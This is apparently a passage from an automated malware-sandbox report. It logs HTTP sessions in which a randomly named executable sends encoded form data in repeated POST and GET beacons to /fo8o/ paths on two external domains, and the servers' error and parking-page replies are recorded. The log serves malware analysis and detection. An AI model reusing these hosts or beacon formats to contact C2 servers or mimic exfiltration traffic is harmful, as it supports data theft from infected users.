                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 6e 64 63 46 72 30 4b 55 71 49 78 6b 30 62 6d 52 59 7a 6d 53 71 4f 73 32 50 4f 75 4b 73 4d 4d 4a 7a 30 64 67 68 67
                                                          Data Ascii: Plm0mn68=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5ndcFr0KUqIxk0bmRYzmSqOs2POuKsMMJz0dghg
                                                          May 23, 2024 20:21:49.551377058 CEST225INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.14.1
                                                          Date: Thu, 23 May 2024 18:21:49 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          X-Rate-Limit-Limit: 5s
                                                          X-Rate-Limit-Remaining: 18
                                                          X-Rate-Limit-Reset: 2024-05-23T18:21:51.8920515Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.84973085.159.66.93803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:21:51.297612906 CEST1820OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.magmadokum.com
                                                          Origin: http://www.magmadokum.com
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1245
                                                          Referer: http://www.magmadokum.com/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 79 33 54 69 55 4d 61 74 73 6d 2f 37 43 70 51 55 37 78 45 6d 4b 4f 33 48 63 59 76 79 34 6c 69 45 47 48 36 48 62 46 6a 59 4a 63 65 4d 72 2b 51 30 59 77 4c 51 43 4e 33 73 52 45 68 32 64 6f 47 4d 63 6e 49 67 53 73 4a 32 4b 71 68 33 30 78 30 4b 4d 52 54 4f 4f 67 38 54 78 55 44 54 31 61 67 53 4a 65 41 49 33 38 77 37 74 69 2b 73 6b 58 6e 4d 4b 2f 55 2f 4a 50 4f 73 39 38 51 49 70 78 55 77 32 4d 67 4d 47 39 78 67 77 68 57 74 75 72 44 7a 73 68 43 41 76 54 6d 64 50 70 2f 70 2b 44 33 [TRUNCATED]
                                                          Data Ascii: Plm0mn68=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhy3TiUMatsm/7CpQU7xEmKO3HcYvy4liEGH6HbFjYJceMr+Q0YwLQCN3sREh2doGMcnIgSsJ2Kqh30x0KMRTOOg8TxUDT1agSJeAI38w7ti+skXnMK/U/JPOs98QIpxUw2MgMG9xgwhWturDzshCAvTmdPp/p+D3kod2l+4YvNn23tJipx85/rQsbb3tgjLhyi4g5fehCShG7oCKTUnlOGH7C/MLlLCFBepNCelwLd4FLiBuORrSPOKduH55uS2VuHEswTtqhBHwv4C63V5L8iD6jh4S6IfuEsb550muWnceqjpZzyLMUjjSstzqUTEzcqCh3s0GygiIiGABXNndetPURp51YCM4BQrd4vU6zDj6ZBwMzEeksp+A5NScTgSWHw+ayhmDaNg+EJ403kuMWC0X/qCbL4XKoj+Wgnfwg+CX9Q70Ap4JjvUTYSz8DsPdH2QFrZPtYnFB2Ss7h9Q4/UgwPvaa3Wk/+1UJnYmUQOFr9/VYVEey20mWWfkfqjZG/V2carnYbPufkZzPkALwkc6/x4iC9pnI7C85OmIoeaiI3tRMm0MIjOaoF6gr/jLjeU6ni2osqdmtL83+Jwj62S8cEiNIo7OXMYmpNnfDLyxdcxrFVIx1rQK43FfeSQmEeaOSdn2lH3pYEKEfsk7dwSeIb1DpA/cxDI4pPvGEuUtJfs8tRkBN9dyWS7SbTpvIkNTKtqsXIedR6y3caJX05ou05OXbdLEr+2DafkuDfyYvlEyiR+oPTnyDEr87BJUlIm5myfGz/hCMaH8qAhMeedSacIbcG7+gK9ZeYt+UYSmUQN7j2tpb1ibWO5daleZ2Qo [TRUNCATED]
                                                          May 23, 2024 20:21:52.087414980 CEST225INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.14.1
                                                          Date: Thu, 23 May 2024 18:21:51 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          X-Rate-Limit-Limit: 5s
                                                          X-Rate-Limit-Remaining: 19
                                                          X-Rate-Limit-Reset: 2024-05-23T18:21:56.9522586Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.84973185.159.66.93803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:21:53.842391968 CEST520OUTGET /fo8o/?kzN4Y=k0xDPL&Plm0mn68=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKEsqfuFkq5cAQSWi7WA8E0wwXs8UZjiSCj3RZ8cyRYh4cA== HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Host: www.magmadokum.com
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          May 23, 2024 20:21:54.623261929 CEST225INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.14.1
                                                          Date: Thu, 23 May 2024 18:21:54 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          X-Rate-Limit-Limit: 5s
                                                          X-Rate-Limit-Remaining: 19
                                                          X-Rate-Limit-Reset: 2024-05-23T18:21:59.4967144Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.84973291.195.240.94803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:21:59.809736013 CEST786OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.rssnewscast.com
                                                          Origin: http://www.rssnewscast.com
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 209
                                                          Referer: http://www.rssnewscast.com/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 74 77 71 66 4e 4d 51 31 79 63 59 32 64 72 47 6d 77 6a 2f 46 42 50 61 38 6b 49 4c 55 6e 58 68 58 54 42 65 30 50 30 3d
                                                          Data Ascii: Plm0mn68=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8ptwqfNMQ1ycY2drGmwj/FBPa8kILUnXhXTBe0P0=
                                                          May 23, 2024 20:22:00.487035990 CEST701INHTTP/1.1 405 Not Allowed
                                                          date: Thu, 23 May 2024 18:22:00 GMT
                                                          content-type: text/html
                                                          content-length: 556
                                                          server: NginX
                                                          connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.84973391.195.240.94803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:22:02.377582073 CEST806OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.rssnewscast.com
                                                          Origin: http://www.rssnewscast.com
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 229
                                                          Referer: http://www.rssnewscast.com/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 6e 78 38 6e 67 39 52 51 4b 4a 4e 77 52 75 71 59 69 72 2b 5a 4c 76 35 44 44 4c 62 55 2f 55 34 52 42 43 41 4a 64 66
                                                          Data Ascii: Plm0mn68=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBnx8ng9RQKJNwRuqYir+ZLv5DDLbU/U4RBCAJdf
                                                          May 23, 2024 20:22:03.020734072 CEST701INHTTP/1.1 405 Not Allowed
                                                          date: Thu, 23 May 2024 18:22:02 GMT
                                                          content-type: text/html
                                                          content-length: 556
                                                          server: NginX
                                                          connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.84973491.195.240.94803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:22:04.924504995 CEST1823OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.rssnewscast.com
                                                          Origin: http://www.rssnewscast.com
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1245
                                                          Referer: http://www.rssnewscast.com/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 59 42 31 64 62 75 6d 32 33 67 5a 41 33 54 6c 48 6f 6d 49 7a 6d 70 4b 79 68 36 33 62 53 5a 31 66 65 45 79 6a 2f 6e 5a 33 75 6d 6c 51 4e 56 52 65 68 4f 31 36 35 63 4f 37 32 6c 69 68 4e 46 4c 78 6b 59 43 6a 56 6b 52 78 4d 79 6c 4c 70 48 69 2f 7a 71 65 4a 48 49 31 64 75 30 31 42 36 61 46 56 45 43 2b 47 4b 39 57 4a 55 36 67 59 4a 55 4f 65 63 43 6a 7a 4b 2b 73 77 43 33 61 79 62 38 5a 6d 48 5a 65 4a 2f 34 4f 53 53 44 72 58 4f 71 52 44 79 73 57 66 4e 33 69 72 64 62 46 68 52 78 48 [TRUNCATED]
                                                          Data Ascii: Plm0mn68=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iYB1dbum23gZA3TlHomIzmpKyh63bSZ1feEyj/nZ3umlQNVRehO165cO72lihNFLxkYCjVkRxMylLpHi/zqeJHI1du01B6aFVEC+GK9WJU6gYJUOecCjzK+swC3ayb8ZmHZeJ/4OSSDrXOqRDysWfN3irdbFhRxHasdGJ8fHmgRUQ7q75bPSfk5DUYG9UBoGdi8/mF/xbb5iSBE5JY12dA9aYXe5DGaUCD9a4C2fei4rNKdFN+HqOOHs4LSir46C20h2WaW7eC3QW4PogCzq1ABunaNscL+QtWzR0nRbjK8h1wMNNZK1kvY/idMEQnuN84DrQkl9yEHr/QZAkU1YvAd6bcquPTPdS4DMq3WNT/pNuf48eWAphVo3frnIBE7Oe8D7pck3In9ALm9G+90KsSjAUeJtA7laQxkUenNErcll/4FAW2QzPEvIQLZ1bas+Tc/CwBBOKYVQyGBcSf4KEdXQBSQWLdD2CsRN4O+pTSZ8xUOyVuX2jzxm3v85LlKbFqo/3DNqMoOtLPSZdId5yGC9dSFkECsj6eUxEfV5Tr4QzrlJ/9T/Q9IIeKl+fkl6ne3H7WML89s6JOmIvv+994w9xh2nc2sPi0b/mkR4m4EOZDuIDVl7Ig1wyvt2mikh74AIquIkSSDykGjNs5hUjFC5y07fSK/YkfSaB9s9wv0JUa6Wmr9K096ZO+26sihRIE7NNYUmT1X9p0kYdhWt6HVofiWX/1/d/Wn4XzisvVv3sm2gR24jUNOheZ7WH5tC2h60lPsIbCr2v1bnl8wn/gesZL9q/Brl3FyJjJ3nKdoHP3bj+k8a9vGQzaMR8gZSLI [TRUNCATED]
                                                          May 23, 2024 20:22:05.607538939 CEST701INHTTP/1.1 405 Not Allowed
                                                          date: Thu, 23 May 2024 18:22:05 GMT
                                                          content-type: text/html
                                                          content-length: 556
                                                          server: NginX
                                                          connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.84973591.195.240.94803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:22:07.485599995 CEST521OUTGET /fo8o/?Plm0mn68=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNup0fu2K1aHG/1RRjejs3ag7ONVYGhhFLwGMDRFljOPFYJw==&kzN4Y=k0xDPL HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Host: www.rssnewscast.com
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          May 23, 2024 20:22:08.268376112 CEST1236INHTTP/1.1 200 OK
                                                          date: Thu, 23 May 2024 18:22:08 GMT
                                                          content-type: text/html; charset=UTF-8
                                                          transfer-encoding: chunked
                                                          vary: Accept-Encoding
                                                          x-powered-by: PHP/8.1.17
                                                          expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                          cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          pragma: no-cache
                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_SjGtE+c0IQAhANGqMcP0Jh5kcoEmxOnE8ys/T9mCN66mk8JfARDFHqNpRgCuX5ky5ylCxBHOIXIZsCBJdPCGTQ==
                                                          last-modified: Thu, 23 May 2024 18:22:08 GMT
                                                          x-cache-miss-from: parking-6cfd44ff49-qlmbl
                                                          server: NginX
                                                          connection: close
                                                          Data Raw: 38 34 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 53 6a 47 74 45 2b 63 30 49 51 41 68 41 4e 47 71 4d 63 50 30 4a 68 35 6b 63 6f 45 6d 78 4f 6e 45 38 79 73 2f 54 39 6d 43 4e 36 36 6d 6b 38 4a 66 41 52 44 46 48 71 4e 70 52 67 43 75 58 35 6b 79 35 79 6c 43 78 42 48 4f 49 58 49 5a 73 43 42 4a 64 50 43 47 54 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED]
                                                          Data Ascii: 844<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_SjGtE+c0IQAhANGqMcP0Jh5kcoEmxOnE8ys/T9mCN66mk8JfARDFHqNpRgCuX5ky5ylCxBHOIXIZsCBJdPCGTQ==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for
